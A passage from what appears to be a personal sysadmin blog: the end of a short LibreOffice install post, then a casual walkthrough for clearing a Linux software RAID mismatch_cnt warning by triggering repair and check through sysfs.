apt-get update
apt-get install libreoffice

more to come...

Cheers :)

raid-check mismatch count

Lets see…

You have a server with soft raid (unfortunately but ur gona have to live with it!) and you get the unfortunate email:
/etc/cron.weekly/99-raid-check:
WARNING: mismatch_cnt is not 0 on /dev/md0
Step 1: Dont panic ;)
Step 2:Troubleshooting
cat /sys/block/md0/md/mismatch_cnt
you should be seeing a number there other than the good 0
so
cat /sys/block/md0/md/sync_action
should be idle… so lets wake it up:
echo repair > /sys/block/md0/md/sync_action
echo check > /sys/block/md0/md/sync_action
cat /proc/mdstat
all looks well in the world and
cat /sys/block/md0/md/mismatch_cnt is 0 this time ;)
Cheers :)